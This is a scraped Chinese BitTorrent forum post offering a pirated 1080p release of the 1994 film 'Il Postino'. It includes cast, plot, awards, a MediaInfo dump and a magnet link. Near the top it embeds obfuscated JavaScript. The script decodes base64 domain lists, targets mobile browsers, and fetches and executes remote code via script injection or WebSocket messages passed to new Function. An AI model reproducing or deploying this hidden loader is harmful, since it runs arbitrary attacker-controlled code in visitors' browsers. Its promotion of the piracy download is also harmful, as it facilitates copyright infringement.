邮差[中文字幕]The.Postman.1994.1080p.FriDay.WEB-DL.H264.AAC-xiaopie-迅雷下载 3.18GB

版主小s 23天前 192

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 邮差 / The Postman / 事先张扬的求爱事件

◎片 名 Il postino

◎年 代 1994

◎产 地 意大利 / 法国 / 比利时

◎类 别 剧情 / 喜剧 / 爱情 / 传记

◎语 言 意大利语 / 西班牙语

◎上映日期 1994-09-01

◎IMDb评分 7.7/10 from 32464 users

◎IMDb链接 https://www.imdb.com/title/tt0110877

◎豆瓣评分 8.8/10 from 14895 users

◎豆瓣链接 https://movie.douban.com/subject/1298468/

◎片 长 108分钟

◎导 演 迈克尔·莱德福 Michael Radford / 马西莫·特罗西 Massimo Troisi

◎编 剧 富里奥·斯卡派利 Furio Scarpelli / Giacomo Scarpelli

◎主 演 菲利浦·诺瓦雷 Philippe Noiret

马西莫·特罗西 Massimo Troisi

玛莉亚·嘉西亚·古欣娜塔 Maria Grazia Cucinotta

Renato Scarpa

Linda Moretti

◎标 签 意大利 | 聂鲁达 | 爱情 | 意大利电影 | 经典 | 邮差 | 法国 | 电影

◎简 介

马里奥(马西莫?特罗西 Massimo Troisi 饰)是一个渔民的儿子,他并不喜欢大海,却当上了邮递员,专门负责小岛上信件的发送。

小岛上住着智利诗人聂鲁达(菲利浦?诺瓦雷 Philippe Noiret 饰)和他的妻子。聂鲁达被流放至此地,他擅长写诗,才华横溢。马里奥每天都收发很多聂鲁达的信件。在频繁的接触中,马里奥越发崇拜这个诗人,他热衷于跟聂鲁达讨论诗,学习诗。当爱上岛上的美丽姑娘后,马里奥经常跟聂鲁达倾诉心事,并最终用诗打动了姑娘的芳心,二人结成伉俪。

直到聂鲁达离开小岛,马里奥仍然坚持着对诗的热爱。他继续写诗,正打算在工人集会上读诗,却遭致了意想不到的灾难。

◎获奖情况

第68届奥斯卡金像奖(1996)

最佳影片(提名) Vittorio Cecchi Gori / Gaetano Daniele / Mario Cecchi Gori

最佳导演(提名) 迈克尔·莱德福

最佳男主角(提名) 马西莫·特洛伊西

最佳改编剧本(提名) 富里奥·斯卡佩利 / 贾科莫·斯卡尔佩利 / 迈克尔·莱德福 / 马西莫·特洛伊西 / 安娜·帕维格纳诺

剧情片最佳原创配乐 路易斯·巴卡洛夫

第49届英国电影学院奖(1996)

电影奖 最佳导演 迈克尔·莱德福

电影奖 最佳男主角(提名) 马西莫·特洛伊西

电影奖 最佳改编剧本(提名) 富里奥·斯卡佩利 / 贾科莫·斯卡尔佩利 / 迈克尔·莱德福 / 马西莫·特洛伊西 / 安娜·帕维格纳诺

电影奖 最佳非英语片 Gaetano Daniele / Vittorio Cecchi Gori / 迈克尔·莱德福 / Mario Cecchi Gori

电影奖 最佳原创音乐 路易斯·巴卡洛夫

第20届日本电影学院奖(1997)

最佳外语片

  1. General

  2. Unique ID : 126409648353493429842803737228160006859 (0x5F199CDA0F978584031701A1BF43FACB)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 3.18 GiB

  7. Duration : 1 h 53 min

  8. Overall bit rate : 4 006 kb/s

  9. Encoded date : UTC 2021-07-09 04:42:30

  10. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 1 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 1 frame

  20. Format settings, GOP : M=1, N=60

  21. Codec ID : V_MPEG4/ISO/AVC

  22. Duration : 1 h 53 min

  23. Bit rate mode : Constant

  24. Bit rate : 4 000 kb/s

  25. Width : 1 920 pixels

  26. Height : 1 080 pixels

  27. Display aspect ratio : 16:9

  28. Frame rate mode : Constant

  29. Frame rate : 29.970 (30000/1001/53354) FPS

  30. Color space : YUV

  31. Chroma subsampling : 4:2:0

  32. Bit depth : 8 bits

  33. Scan type : Progressive

  34. Bits/(Pixel*Frame) : 0.064

  35. Stream size : 3.08 GiB (97%)

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. Format : AAC LC

  41. Format/Info : Advanced Audio Codec Low Complexity

  42. Codec ID : A_AAC-2

  43. Duration : 1 h 53 min

  44. Bit rate : 125 kb/s

  45. Channel(s) : 2 channels

  46. Channel layout : L R

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 46.875 FPS (1024 SPF)

  49. Compression mode : Lossy

  50. Stream size : 102 MiB (3%)

  51. Language : Italian

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. Format : UTF-8

  57. Codec ID : S_TEXT/UTF8

  58. Codec ID/Info : UTF-8 Plain Text

  59. Duration : 1 h 50 min

  60. Bit rate : 36 b/s

  61. Count of elements : 1282

  62. Stream size : 29.3 KiB (0%)

  63. Title : Chinese Simplified

  64. Language : Chinese

  65. Default : Yes

  66. Forced : No


  67. Text #2

  68. ID : 4

  69. Format : UTF-8

  70. Codec ID : S_TEXT/UTF8

  71. Codec ID/Info : UTF-8 Plain Text

  72. Duration : 1 h 50 min

  73. Bit rate : 36 b/s

  74. Count of elements : 1282

  75. Stream size : 29.3 KiB (0%)

  76. Title : Chinese Traditional

  77. Language : Chinese

  78. Default : No

  79. Forced : No


TAGS 剧情 喜剧 爱情 传记

磁力链:
  • magnet:?xt=urn:btih:779506C74D656DAD3CADA34FB65FA6B70EE58C69
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回